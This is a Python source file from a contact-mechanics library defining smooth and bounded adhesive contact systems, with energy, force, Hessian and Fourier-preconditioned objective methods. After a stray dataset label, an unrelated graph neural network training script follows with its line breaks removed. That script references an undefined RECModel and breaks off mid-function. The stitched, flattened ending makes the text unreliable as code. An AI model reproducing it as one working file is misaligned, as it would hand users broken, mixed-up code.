# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Defines the interface for Adhesion systems
"""

import numpy as np

import Adhesion
import ContactMechanics
import SurfaceTopography
from ContactMechanics.Tools import compare_containers
from ContactMechanics.Systems import IncompatibleResolutionError, SystemBase


class SmoothContactSystem(SystemBase):
    """
    For smooth contact mechanics (i.e. the ones for which optimization is
    only kinda-hell
    """

    def __init__(self, substrate, interaction, surface):
        """
        Represents a contact problem

        Parameters
        ----------
        substrate: An instance of HalfSpace.
            Defines the solid mechanics in the substrate
        interaction: Adhesion.Interactions.SoftWall
            Defines the contact formulation. If this computes interaction
            energies, forces etc, these are supposed to be expressed per
            unit area in whatever units you use. The conversion is
            performed by the system
        surface: SurfaceTopography.Topography
            Defines the profile.
        """
        if surface.has_undefined_data:
            raise ValueError("The topography you provided contains undefined "
                             "data")
        super().__init__(substrate=substrate, surface=surface)
        self.interaction = interaction
        if not compare_containers(surface.nb_grid_pts, substrate.nb_grid_pts):
            raise IncompatibleResolutionError(
                ("the substrate ({}) and the surface ({}) have incompatible "
                 "nb_grid_pts.").format(
                    substrate.nb_grid_pts, surface.nb_grid_pts))  # nopep8
        self.dim = len(self.substrate.nb_grid_pts)
        self.energy = None
        self.force = None
        self.force_h = None
        self.interaction_energy = None
        self.interaction_force = None
        self.heights_k = None
        self.engine = self.substrate.fftengine

        if hasattr(substrate.fftengine, "register_halfcomplex_field") and self.engine.communicator.size == 1:
            # avoids the initialization failing if we use an fftengine without
            # these hcffts implemented; preconditioning is not parallelized
            # yet, thus we have no parallelized wrapper for hcfft in muFFT yet
            self.real_buffer = self.engine.register_halfcomplex_field("hc-real-space", 1)
            self.fourier_buffer = self.engine.register_halfcomplex_field("hc-fourier-space", 1)
            self.stiffness_k = self._compute_stiffness_k()

    @property
    def nb_grid_pts(self):
        return self.surface.nb_grid_pts

    @staticmethod
    def handles(substrate_type, interaction_type, surface_type, comm):
        is_ok = True
        # any periodic type of substrate formulation should do
        is_ok &= issubclass(substrate_type, ContactMechanics.Substrate)
        # only soft interactions allowed
        is_ok &= issubclass(interaction_type, Adhesion.SoftWall)
        # any surface should do
        is_ok &= issubclass(surface_type, SurfaceTopography.UniformTopographyInterface)
        return is_ok

    def compute_repulsive_force(self):
        "computes and returns the sum of all repulsive forces"
        return self.reduction.sum(np.where(
            self.interaction_force > 0, self.interaction_force, 0))

    def compute_attractive_force(self):
        "computes and returns the sum of all attractive forces"
        return self.reduction.sum(np.where(
            self.interaction_force < 0, self.interaction_force, 0))

    def _compute_stiffness_k(self):
        """
        computes and returns the wavevectors q that exist for the surface's
        physical_sizes and nb_grid_pts as one vector of components per
        dimension
        """
        vectors = []
        q = []
        nb_dims = len(self.substrate.nb_grid_pts)
        # if nb_dims == 1:
        #     nb_grid_pts = [self.substrate.nb_grid_pts]
        #     physical_sizes = [self.substrate.physical_sizes]
        for dim in range(nb_dims):
            vectors.append(2 * np.pi * np.fft.fftfreq(
                self.substrate.nb_grid_pts[dim],
                self.substrate.physical_sizes[dim] /
                self.substrate.nb_grid_pts[dim]))
        if nb_dims == 1:
            q = vectors[0]
            q[0] = q[1]
        elif nb_dims == 2:
            qx = vectors[0]
            qy = vectors[1]
            q = np.sqrt(
                (qx * qx).reshape((-1, 1)) + (qy * qy).reshape((1, -1)))
            q[0, 0] = (q[0, 1] + q[1, 0]) / 2
        return 0.5 * self.substrate.contact_modulus * abs(q)

    def compute_normal_force(self):
        "computes and returns the sum of all forces"
        return self.reduction.sum(self.interaction_force)

    def compute_repulsive_contact_area(self):
        "computes and returns the area where contact pressure is repulsive"
        return self.compute_nb_repulsive_pts() * self.area_per_pt

    def compute_attractive_contact_area(self):
        "computes and returns the area where contact pressure is attractive"
        return self.compute_nb_attractive_pts() * self.area_per_pt

    def compute_nb_contact_pts(self):
        """
        compute and return the number of contact points. Note that this is
        of no physical interest, as it is a purely numerical artefact
        """
        return self.reduction.sum(
            np.where(self.interaction_force != 0., 1., 0.))

    def compute_nb_repulsive_pts(self):
        """
        compute and return the number of contact points under repulsive
        pressure. Note that this is of no physical interest, as it is a
        purely numerical artefact
        """
        return self.reduction.sum(
            np.where(self.interaction_force > 0., 1., 0.))

    def compute_nb_attractive_pts(self):
        """
        compute and return the number of contact points under attractive
        pressure. Note that this is of no physical interest, as it is a
        purely numerical artefact
        """
        return self.reduction.sum(
            np.where(self.interaction_force < 0., 1., 0.))

    def compute_repulsive_coordinates(self):
        """
        returns an array of all coordinates, where contact pressure is
        repulsive. Useful for evaluating the number of contact islands etc.
        """
        return np.argwhere(self.interaction_force > 0.)

    def compute_attractive_coordinates(self):
        """
        returns an array of all coordinates, where contact pressure is
        attractive. Useful for evaluating the number of contact islands etc.
        """
        return np.argwhere(self.interaction_force < 0.)

    def compute_mean_gap(self):
        """
        mean of the gap in the physical domain (i.e. excluding the padding
        region for the FreeFFTElasticHalfspace)
        """
        return self.reduction.sum(self.gap) / np.prod(self.nb_grid_pts)

    def logger_input(self):
        """
        Returns
        -------
        headers: list of strings
        values: list
        """
        tot_nb_grid_pts = np.prod(self.nb_grid_pts)
        rel_rep_area = self.compute_nb_repulsive_pts() / tot_nb_grid_pts
        rel_att_area = self.compute_nb_attractive_pts() / tot_nb_grid_pts
        # TODO: eventually put a flag to turn
        # reductions off since this is an additional communication.
        return (['energy', 'max. abs. grad.', 'mean gap', 'frac. rep. area',
                 'frac. att. area', 'frac. int. area', 'substrate force',
                 'interaction force'],
                [self.energy,
                 self.reduction.max(np.abs(self.force)),
                 self.compute_mean_gap(),
                 rel_rep_area,
                 rel_att_area,
                 rel_rep_area + rel_att_area,
                 -self.reduction.sum(self.substrate.force),
                 self.reduction.sum(self.interaction_force)])

    def evaluate(self, disp, offset, pot=True, forces=False, logger=None):
        """
        Compute the energies and forces in the system for a given
        displacement field

        Parameters:
        -----------
        disp: ndarray
            displacement field, in the shape of
            system.substrate.nb_subdomain_grid_pts
        offset: float
            determines indentation depth, constant value added to the
            heights (system.topography)
        pot: bool, optional
            Whether to evaluate the energy, default True
        forces: bool, optional
            Whether to evaluate the forces, default False
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation
        """
        # attention: the substrate may have a higher nb_grid_pts than the gap
        # and the interaction (e.g. FreeElasticHalfSpace)
        self.gap = self.compute_gap(disp, offset)
        interaction_energies, self.interaction_force, _ = \
            self.interaction.evaluate(self.gap,
                                      potential=pot,
                                      gradient=forces,
                                      curvature=False)

        self.interaction_energy = \
            self.reduction.sum(interaction_energies) * self.area_per_pt

        self.substrate.compute(disp, pot, forces)
        self.energy = (self.interaction_energy +
                       self.substrate.energy
                       if pot else None)
        if forces:
            self.interaction_force *= -self.area_per_pt
            # ^ gradient to force per pixel
            self.force = self.substrate.force.copy()
            self.force[self.comp_slice] += \
                self.interaction_force
        else:
            self.force = None

        if logger is not None:
            logger.st(*self.logger_input())
        return (self.energy, self.force)

    def objective(self, offset, disp0=None, gradient=False, disp_scale=1.,
                  logger=None):
        r"""
        This helper method exposes a scipy.optimize-friendly interface to
        the evaluate() method. Use this for optimization purposes, it makes
        sure that the shape of disp is maintained and lets you set the
        offset and 'forces' flag without using scipy's cumbersome argument
        passing interface. Returns a function of only disp

        Parameters:
        -----------
        disp0: ndarray
            unused variable, present only for interface compatibility with
            inheriting classes
        offset: float
            determines indentation depth, constant value added to the
            heights (system.topography)
        gradient: bool, optional
            Whether to evaluate the gradient, default False
        disp_scale : float, optional
            (default 1.) allows to specify a scaling of the displacement
            before evaluation. This can be necessary when using dumb
            minimizers with hardcoded convergence criteria such as scipy's
            L-BFGS-B.
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation

        Returns:
            function(disp)

            Parameters:
                disp: an ndarray of shape
                    `system.substrate.nb_subdomain_grid_pts` displacements

            Returns:
                energy or energy, gradient
        """
        res = self.substrate.nb_subdomain_grid_pts
        if gradient:
            def fun(disp):
                # pylint: disable=missing-docstring
                try:
                    self.evaluate(
                        disp_scale * disp.reshape(res), offset, forces=True,
                        logger=logger)
                except ValueError as err:
                    raise ValueError(
                        "{}: disp.shape: {}, res: {}".format(
                            err, disp.shape, res))
                return (self.energy, -self.force.reshape(-1) * disp_scale)
        else:
            def fun(disp):
                # pylint: disable=missing-docstring
                return self.evaluate(
                    disp_scale * disp.reshape(res), offset, forces=False,
                    logger=logger)[0]

        return fun

    def primal_evaluate(self, disp, gap, pot=True, forces=False, logger=None):
        """
        Compute the energies and forces in the system for a given
        displacement and gap.

        Parameters:
        -----------
        disp: ndarray
            displacement field, in the shape of
            system.substrate.nb_subdomain_grid_pts
        gap: ndarray
            gap, in the shape of system.substrate.nb_subdomain_grid_pts
        pot: bool, optional
            Whether to evaluate the energy, default True
        forces: bool, optional
            Whether to evaluate the forces, default False
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation
        """
        # attention: the substrate may have a higher nb_grid_pts than the gap
        # and the interaction (e.g. FreeElasticHalfSpace)
        self.gap = gap
        interaction_energies, self.interaction_force, _ = \
            self.interaction.evaluate(self.gap,
                                      potential=pot,
                                      gradient=forces,
                                      curvature=False)

        self.interaction_energy = \
            self.reduction.sum(interaction_energies) * self.area_per_pt

        self.substrate.compute(disp, pot, forces)
        self.energy = (self.interaction_energy +
                       self.substrate.energy
                       if pot else None)
        if forces:
            self.interaction_force *= -self.area_per_pt
            # ^ gradient to force per pixel
            self.force = self.substrate.force.copy()
            self.force[self.comp_slice] += self.interaction_force
        else:
            self.force = None

        if logger is not None:
            logger.st(*self.logger_input())

        return (self.energy, self.force)

    def primal_objective(self, offset, disp0=None, gradient=False,
                         logger=None):
        r"""To solve the primal objective using gap as the variable.
        Can be fed directly to standard solvers, e.g. scipy solvers,
        and returns the elastic energy and its gradient (negative of
        the forces) as a function of the gap.

        Parameters
        __________

        gap : float
            gap between the contact surfaces.
        offset : float
            constant value to add to the surface heights
        pot : (default False)
        gradient : (default True)

        Returns
        _______
        energy : float
            value of energy (scalar value).
        force : float, array
            value of force (array).

        Notes
        _____

        Objective:

        .. math ::

            \min_u f = \frac{1}{2} u_i K_{ij} u_j + \phi (u_{ij})\\
            \\
            \nabla f = K_{ij} u_j + \phi^{\prime}
            \text{ which is the force} \\
        """
        res = self.substrate.nb_subdomain_grid_pts
        if gradient:
            def fun(gap):
                disp = gap.reshape(res) + self.surface.heights() + offset
                try:
                    self.primal_evaluate(
                        disp, gap.reshape(res), forces=True, logger=logger)
                except ValueError as err:
                    raise ValueError(
                        "{}: gap.shape: {}, res: {}".format(
                            err, gap.shape, res))
                return (self.energy, -self.force.reshape(-1))
        else:
            def fun(gap):
                disp = gap.reshape(res) + self.surface.heights() + offset
                return self.primal_evaluate(
                    disp, gap.reshape(res), forces=False, logger=logger)[0]

        return fun

    def primal_hessian_product(self, gap, des_dir):
        """Returns the hessian product of the primal_objective function.
        """
        _, _, adh_curv = self.interaction.evaluate(gap, curvature=True)

        hessp_val = - self.substrate.evaluate_force(
            des_dir.reshape(self.substrate.nb_subdomain_grid_pts)
        ).reshape(np.shape(des_dir)) \
            + adh_curv * des_dir * self.substrate.area_per_pt

        return hessp_val.reshape(des_dir.shape)

    def hessian_product_function(self, offset):
        def hessp(disp, des_dir):
            gap = disp.reshape(self.substrate.nb_subdomain_grid_pts
                               )[self.comp_slice] \
                - (self.surface.heights() + offset)
            _, _, adh_curv = self.interaction.evaluate(gap, curvature=True)
            hessp_val = - self.substrate.evaluate_force(
                des_dir.reshape(self.substrate.nb_subdomain_grid_pts))
            hessp_val[self.comp_slice] += adh_curv \
                * des_dir.reshape(
                    self.substrate.nb_subdomain_grid_pts)[self.comp_slice] \
                * self.substrate.area_per_pt
            return hessp_val.reshape(des_dir.shape)

        return hessp

    def _fourier_coefficients(self):
        """
        Returns the coefficients for the elasticity matrix when working in
        fourier space, for both 1D and 2D systems.
        """
        nx = self.substrate.nb_grid_pts[0]
        nb_dims = len(self.substrate.nb_grid_pts)
        if nb_dims == 2:
            ny = self.substrate.nb_grid_pts[1]
            coeffs = np.zeros(self.substrate.nb_grid_pts)
            if np.logical_and((nx % 2 == 0), (ny % 2 == 0)):
                coeffs[0, 0] = 1 / (nx * ny)
                coeffs[0, 1:ny // 2] = 2 / (nx * ny)
                coeffs[0, ny // 2 + 1:] = 2 / (nx * ny)
                coeffs[1:nx // 2, 0] = 2 / (nx * ny)
                coeffs[nx // 2 + 1:, 0] = 2 / (nx * ny)
                coeffs[:nx // 2, ny // 2] = 2 / (nx * ny)
                coeffs[nx // 2 + 1:, ny // 2] = 2 / (nx * ny)
                coeffs[nx // 2, :ny // 2] = 2 / (nx * ny)
                coeffs[nx // 2, ny // 2 + 1:] = 2 / (nx * ny)
                coeffs[1:nx // 2, 1:ny // 2] = 4 / (nx * ny)
                coeffs[nx // 2 + 1:, 1:ny // 2] = 4 / (nx * ny)
                coeffs[1:nx // 2, ny // 2 + 1:] = 4 / (nx * ny)
                coeffs[nx // 2 + 1:, ny // 2 + 1:] = 4 / (nx * ny)
                coeffs[nx // 2, ny // 2] = 1 / (nx * ny)
                coeffs[nx // 2, 0] = 1 / (nx * ny)
                coeffs[0, ny // 2] = 1 / (nx * ny)
            else:
                coeffs[0, 0] = 1 / (nx * ny)
                coeffs[0, 1:] = 2 / (nx * ny)
                coeffs[1:, 0] = 2 / (nx * ny)
                coeffs[1:, 1:] = 4 / (nx * ny)
        elif nb_dims == 1:
            coeffs = np.zeros(self.substrate.nb_grid_pts)
            if (nx % 2 == 0):
                coeffs[0] = 1 / nx
                coeffs[1:nx // 2] = 2 / nx
                coeffs[nx // 2 + 1:] = 2 / nx
                coeffs[nx // 2] = 1 / nx
            else:
                coeffs[0] = 1 / nx
                coeffs[1:] = 2 / nx
        return coeffs

    def evaluate_k(self, disp_k, gap, offset, mw=False, pot=True,
                   forces=False, logger=None):
        """
        Compute the energies and forces in the system for a given
        displacement field in fourier space.

        Parameters
        -----------
        disp_k: ndarray
            displacement field in fourier space.
        gap: ndarray
            displacement field in real space, in the shape of
            system.substrate.nb_subdomain_grid_pts
        offset: float
            determines indentation depth, constant value added to the
            heights (system.topography)
        mw: bool, optional
            when mass weighting is required then set this to TRUE.
        pot: bool, optional
            Whether to evaluate the energy, default True
        forces: bool, optional
            Whether to evaluate the forces, default False
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation.
        """
        # self.gap = self.compute_gap(disp, offset)
        self.gap = gap
        interaction_energies, self.interaction_force, _ = \
            self.interaction.evaluate(self.gap,
                                      potential=pot,
                                      gradient=forces,
                                      curvature=False)

        self.interaction_energy = \
            self.reduction.sum(interaction_energies) * self.area_per_pt

        self.grad_k = np.zeros(self.substrate.nb_grid_pts)
        coeff = self._fourier_coefficients()

        if mw:
            self.grad_k = disp_k * coeff
        else:
            self.grad_k = disp_k * coeff * self.stiffness_k

        self.grad_k *= self.area_per_pt

        # ENERGY FROM SUBSTRATE
        self.energy = 0.5 * (np.sum(self.grad_k * disp_k))
        self.substrate.energy = self.energy
        self.force_h = -self.grad_k

        # TOTAL ENERGY
        self.energy += self.interaction_energy

        if forces:
            self.interaction_force *= -self.area_per_pt
            # ^ gradient to force per pixel
            self.real_buffer.array()[...] = self.interaction_force
            self.engine.hcfft(self.real_buffer, self.fourier_buffer)
            interaction_force_float_k = self.fourier_buffer.array()[...].copy()

            adh_coeffs = self._fourier_coefficients()
            interaction_force_float_k *= adh_coeffs

            if mw:
                k = np.sqrt(self.stiffness_k.copy() * self.area_per_pt)
                interaction_force_float_k = interaction_force_float_k * (1 / k)

            self.force_h += interaction_force_float_k
        else:
            self.force_h = None

        if logger is not None:
            disp_real = self.gap + self.surface.heights().copy() + offset
            force_real = self.substrate.evaluate_force(disp_real)
            force_real = force_real + self.interaction_force
            logger.st(*(['energy', 'max. abs. grad.', 'max. abs. grad. real'],
                        [self.energy,
                         self.reduction.max(np.abs(self.force_h)),
                         self.reduction.max(np.abs(force_real))
                         ]))

        return (self.energy, self.force_h)

    # def hessian_product_k(self, dispk, des_dir_k):
    #     """Returns the hessian product of the fourier space
    #     objective_k function.
    #     """
    #     self.substrate.fourier_buffer.array()[...] = dispk.copy()
    #     self.substrate.fftengine.ifft(self.substrate.fourier_buffer,
    #                                   self.substrate.real_buffer)
    #     disp = self.substrate.real_buffer.array()[...].copy() \
    #         * self.substrate.fftengine.normalisation
    #
    #     gap = self.compute_gap(disp)
    #     _, _, adh_curv = self.interaction.evaluate(gap, curvature=True)
    #
    #     self.substrate.real_buffer.array()[...] = adh_curv.reshape(
    #         self.substrate.nb_grid_pts).copy()
    #     self.substrate.fftengine.fft(self.substrate.real_buffer,
    #                                  self.substrate.fourier_buffer)
    #     adh_curv_k = self.substrate.fourier_buffer.array()[...].copy()
    #
    #     hessp_val_k = -self.substrate.evaluate_k_force_k(des_dir_k) + \
    #         adh_curv_k * des_dir_k * self.substrate.area_per_pt
    #
    #     return hessp_val_k

    # def hessian_product_preconditioned(self, offset):
    #     def hessp_precond(disp_h, des_dir):
    #
    #         self.real_buffer.array()[...] = offset
    #         self.engine.hcfft(self.real_buffer, self.fourier_buffer)
    #         offset_k = self.fourier_buffer.array()[...].copy()
    #
    #         self.real_buffer.array()[...] = self.surface.heights().copy()
    #         self.engine.hcfft(self.real_buffer, self.fourier_buffer)
    #         self.heights_k_float = self.fourier_buffer.array()[...].copy()
    #
    #         disp_float_k = disp_h.copy()
    #         disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts)
    #         gap_float_k = (disp_float_k / np.sqrt(self.stiffness_k *
    #                                               self.area_per_pt)) - \
    #             self.heights_k_float - offset_k
    #
    #         self.fourier_buffer.array()[...] = gap_float_k.copy()
    #         self.engine.ihcfft(self.fourier_buffer, self.real_buffer)
    #         gap = self.real_buffer.array()[...].copy() * \
    #             self.engine.normalisation
    #
    #         _, _, adh_curv = \
    #             self.interaction.evaluate(gap,
    #                                       curvature=True)
    #
    #         coeff = self._fourier_coefficients()
    #
    #         el_hess_k = coeff @ coeff
    #         el_hess_k *= self.area_per_pt
    #
    #         orig_shape = np.shape(des_dir)
    #
    #         el_hess_k *= des_dir  # .reshape(el_hess_k)
    #
    #         adh_curv *= self.area_per_pt
    #
    #         self.real_buffer.array()[...] = adh_curv
    #         self.engine.hcfft(self.real_buffer, self.fourier_buffer)
    #         adh_curv_float_k = self.fourier_buffer.array()[...].copy()
    #
    #         adh_curv_float_k *= coeff @ coeff
    #
    #         k = np.sqrt(self.stiffness_k.copy() * self.area_per_pt)
    #
    #         adh_hess_k = adh_curv_float_k * des_dir * (1 / k) * (1 / k)
    #
    #         hess_k = el_hess_k.reshape(orig_shape) + \
    #             adh_hess_k.reshape(orig_shape)
    #
    #         return hess_k
    #
    #     return hessp_precond

    def preconditioned_objective(self, offset, gradient=False, logger=None):
        r"""
        This helper method interfaces to the evaluate_k() method with
        preconditioning active. That is, it tries to solve a simpler
        problem formulated using,

        original problem:

        .. math ::
            \frac{1}{2(n_x n_y)} \tilde{u}\tilde{K} \bar{\tilde{u}} +
            \phi(F^{-1}(\tilde{u} - \tilde{h}))

        preconditioned problem:

        .. math ::
            \tilde{v} = \tilde{k}^{\frac{1}{2}} \tilde{u} \\
            \frac{1}{2(n_x n_y)} \tilde{v}\bar{\tilde{v}} +
            \phi(F^{-1}(\frac{\tilde{v}}{\tilde{k}^{\frac{1}{2}}} -
            \tilde{h}))

        we solve for variable :math:`\tilde{v}`.

        Parameters:
        -----------
        offset: float
            determines indentation depth, constant value added to the
            heights (system.topography)
        gradient: bool, optional
            Whether to evaluate the gradient, default False
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation

        Returns
        _______
        function(disp_k)

            Parameters
            __________
            disp_k: an ndarray in fourier halfcomplex space

            Returns
            _______
            energy: scalar
                energy of the system
            force_h: an halfcomplex array of shape(disp_k)
                force of the system
        """
        # TODO: fourier transforming the offset is useless
        self.real_buffer.array()[...] = offset
        self.engine.hcfft(self.real_buffer, self.fourier_buffer)
        offset_k = self.fourier_buffer.array()[...].copy()

        self.real_buffer.array()[...] = self.surface.heights().copy()
        self.engine.hcfft(self.real_buffer, self.fourier_buffer)
        self.heights_k_float = self.fourier_buffer.array()[...].copy()

        if gradient:
            def fun(disp_):
                disp_float_k = disp_.copy()
                orig_shape = np.shape(disp_float_k)
                disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts)
                gap_float_k = (disp_float_k /
                               np.sqrt(self.stiffness_k * self.area_per_pt)) \
                    - self.heights_k_float - offset_k

                self.fourier_buffer.array()[...] = gap_float_k.copy()
                self.engine.ihcfft(self.fourier_buffer, self.real_buffer)
                gap = self.real_buffer.array()[...].copy() * \
                    self.engine.normalisation

                self.energy, self.force_h = self.evaluate_k(disp_float_k,
                                                            gap, offset,
                                                            mw=True,
                                                            forces=True,
                                                            logger=logger)
                return (self.energy, -self.force_h.reshape(orig_shape))
        else:
            raise NotImplementedError

        return fun

    def objective_k_float(self, offset, gradient=False, logger=None):
        r"""
        Returns callable objective as needed by scipy minimizers.
        The optimisation variable is the halfcomplex fourier transform of
        the gap.

        This helper method interfaces to the evaluate_k() method without
        preconditioning active.

        .. math ::
            \frac{1}{2(n_x n_y)} \tilde{u}\tilde{K} \bar{\tilde{u}} +
            \phi(F^{-1}(\tilde{u} - \tilde{h})) \\

        preconditioned problem:

        .. math ::
            \tilde{v} = \tilde{k}^{\frac{1}{2}} \tilde{u} \\
            \frac{1}{2(n_x n_y)} \tilde{v} \bar{\tilde{v}} +
            \phi(F^{-1}(\frac{\tilde{v}}{\tilde{k}^{\frac{1}{2}}} -
            \tilde{h})) \\

        we solve for variable :math:`\tilde{v}`.

        Parameters:
        -----------
        offset: float
            determines indentation depth, constant value added to the
            heights (system.topography)
        gradient: bool, optional
            Whether to evaluate the gradient, default False
        logger: ContactMechanics.Tools.Logger
            information on the current state of the system will be passed
            to logger at every evaluation

        Returns
        _______
        function(disp_k)

            Parameters
            __________
            disp_k: an ndarray in fourier space

            Returns
            _______
            energy, gradient_k_float
        """
        self.real_buffer.array()[...] = offset
        self.engine.hcfft(self.real_buffer, self.fourier_buffer)
        offset_k = self.fourier_buffer.array()[...].copy()

        self.real_buffer.array()[...] = self.surface.heights().copy()
        self.engine.hcfft(self.real_buffer, self.fourier_buffer)
        self.heights_k_float = self.fourier_buffer.array()[...].copy()

        if gradient:
            def fun(disp_k):
                disp_float_k = disp_k.copy()
                orig_shape = np.shape(disp_float_k)
                disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts)
                gap_float_k = disp_float_k - self.heights_k_float - offset_k

                self.fourier_buffer.array()[...] = gap_float_k.copy()
                self.engine.ihcfft(self.fourier_buffer, self.real_buffer)
                gap = self.real_buffer.array()[...].copy() \
                    * self.engine.normalisation

                self.energy, self.force_h = self.evaluate_k(disp_float_k,
                                                            gap, offset,
                                                            forces=True,
                                                            logger=logger)
                return (self.energy, -self.force_h.reshape(orig_shape))
        else:
            def fun(disp_k):
                # pylint: disable=missing-docstring
                disp_float_k = disp_k.copy()
                disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts)
                gap_float_k = disp_float_k - self.heights_k_float - offset_k

                self.fourier_buffer.array()[...] = gap_float_k.copy()
                self.engine.ihcfft(self.fourier_buffer, self.real_buffer)
                gap = self.real_buffer.array()[...].copy() \
                    * self.engine.normalisation

                return self.evaluate_k(disp_float_k, gap, offset,
                                       forces=True, logger=logger)[0]

        return fun

    def callback(self, force=False):
        """
        Simple callback function that can be handed over to scipy's minimize
        to get updates during minimisation

        Parameters:
        ----------
        force: bool, optional
            whether to include the norm of the force vector in the update
            message (default False)
        """
        counter = 0
        if force:
            def fun(dummy):
                "includes the force norm in its output"
                nonlocal counter
                counter += 1
                print("at it {}, e = {}, |f| = {}".format(
                    counter, self.energy,
                    np.linalg.norm(np.ravel(self.force))))
        else:
            def fun(dummy):
                "prints messages without force information"
                nonlocal counter
                counter += 1
                print("at it {}, e = {}".format(counter, self.energy))

        return fun


class BoundedSmoothContactSystem(SmoothContactSystem):

    @staticmethod
    def handles(*args, **kwargs):  # FIXME work around, see issue #208
        return False

    def compute_nb_contact_pts(self):
        """
        compute and return the number of contact points.
        """
        return self.reduction.sum(np.where(self.gap == 0., 1., 0.))

    def logger_input(self):
        """
        Returns
        -------
        headers: list of strings
        values: list
        """
        tot_nb_grid_pts = np.prod(self.nb_grid_pts)
        rel_rep_area = self.compute_nb_repulsive_pts() / tot_nb_grid_pts
        rel_att_area = self.compute_nb_attractive_pts() / tot_nb_grid_pts
        # TODO: eventually put a flag to turn
        # reductions off since this is an additional communication.
        contacting_points = self.gap == 0.
        mask = np.ones(self.substrate.nb_subdomain_grid_pts)
        mask[self.substrate.local_topography_subdomain_slices][
            contacting_points] = 0
        max_proj_grad = self.reduction.max(abs(mask * self.force))

        return (['energy', 'max. proj. grad.', 'mean gap',
                 'frac. cont. area', 'frac. rep. area', 'frac. att. area',
                 'frac. int. area', 'substrate force', 'interaction force'],
                [self.energy,
                 max_proj_grad,
                 self.compute_mean_gap(),
                 self.compute_nb_contact_pts() / np.prod(self.nb_grid_pts),
                 rel_rep_area,
                 rel_att_area,
                 rel_rep_area + rel_att_area,
                 -self.reduction.sum(self.substrate.force),
                 self.reduction.sum(self.interaction_force)])

    def compute_normal_force(self):
        "computes and returns the sum of all forces"
        # sum of the jacobian in the contact area (Lagrange multiplier)
        # and the interaction forces.
        # can also be computed easily from the substrate forces,
        # what we do here
        return self.reduction.sum(
            - self.substrate.force[
                self.substrate.local_topography_subdomain_slices])

    def compute_repulsive_force(self):
        """computes and returns the sum of all repulsive forces

        Assumptions: there
        """
        return self.reduction.sum(
            np.where(
                - self.substrate.force[
                    self.substrate.local_topography_subdomain_slices] > 0,
                - self.substrate.force[
                    self.substrate.local_topography_subdomain_slices],
                0.))

    def compute_attractive_force(self):
        "computes and returns the sum of all attractive forces"
        return self.reduction.sum(
            np.where(
                - self.substrate.force[
                    self.substrate.local_topography_subdomain_slices] < 0,
                - self.substrate.force[
                    self.substrate.local_topography_subdomain_slices],
                0.))

    def compute_nb_repulsive_pts(self):
        """
        compute and return the number of contact points under repulsive
        pressure.
        """
        return self.reduction.sum(
            np.where(
                np.logical_and(
                    self.gap == 0.,
                    - self.substrate.force[
                        self.substrate.local_topography_subdomain_slices] > 0),
                1., 0.))

    def compute_nb_attractive_pts(self):
        """
        compute and return the number of contact points under attractive
        pressure.
        """
        # Compute points where substrate force is negative
        # or there is no contact
        pts = np.logical_or(
            - self.substrate.force[
                self.substrate.local_topography_subdomain_slices] < 0,
            self.gap > 0.)

        # exclude points where there is no contact
        # and the interaction force is 0.
        pts[np.logical_and(self.gap > 0.,
                           self.interaction_force == 0.)] = 0.

        return self.reduction.sum(pts)

    def compute_repulsive_coordinates(self):
        """
        returns an array of all coordinates, where contact pressure is
        repulsive. Useful for evaluating the number of contact islands etc.
        """
        return np.argwhere(
            np.logical_and(
                self.gap == 0.,
                - self.substrate.force[
                    self.substrate.local_topography_subdomain_slices] > 0))

    def compute_attractive_coordinates(self):
        """
        returns an array of all coordinates, where contact pressure is
        attractive. Useful for evaluating the number of contact islands etc.
        """
        # Compute points where substrate force is negative
        # or there is no contact
        pts = np.logical_or(
            - self.substrate.force[
                self.substrate.local_topography_subdomain_slices] < 0,
            self.gap > 0.)

        # exclude points where there is no contact
        # and the interaction force is 0.
        pts[np.logical_and(self.gap > 0.,
                           self.interaction_force == 0.)] = 0.

        return np.argwhere(pts)
StarcoderdataPython
3294314
from __future__ import division from __future__ import print_function import datetime import json import logging import os import pickle import time import numpy as np import optimizers import torch from config import parser from models.base_models import NCModel, LPModel from utils.data_utils import load_data from utils.train_utils import get_dir_name, format_metrics import torch.cuda.profiler as profiler def test(args): np.random.seed(args.seed) torch.manual_seed(args.seed) if int(args.double_precision): torch.set_default_dtype(torch.float64) if int(args.cuda) >= 0: torch.cuda.manual_seed(args.seed) args.device = 'cuda:' + str(args.cuda) if int(args.cuda) >= 0 else 'cpu' args.patience = args.epochs if not args.patience else int(args.patience) logging.getLogger().setLevel(logging.INFO) if args.save: if not args.save_dir: dt = datetime.datetime.now() date = f"{dt.year}_{dt.month}_{dt.day}" models_dir = os.path.join(os.environ['LOG_DIR'], args.task, date) save_dir = get_dir_name(models_dir) else: save_dir = args.save_dir logging.basicConfig(level=logging.INFO, handlers=[ logging.FileHandler(os.path.join(save_dir, 'log.txt')), logging.StreamHandler() ]) logging.info(f'Using: {args.device}') logging.info("Using seed {}.".format(args.seed)) # Load data data = load_data(args, os.path.join(os.environ['DATAPATH'], args.dataset)) args.n_nodes, args.feat_dim = data['features'].shape if args.task == 'nc': Model = NCModel args.n_classes = int(data['labels'].max() + 1) logging.info(f'Num classes: {args.n_classes}') else: args.nb_false_edges = len(data['train_edges_false']) args.nb_edges = len(data['train_edges']) if args.task == 'lp': Model = LPModel else: Model = RECModel # No validation for reconstruction task args.eval_freq = args.epochs + 1 if not args.lr_reduce_freq: args.lr_reduce_freq = args.epochs # Model and optimizer model = Model(args) 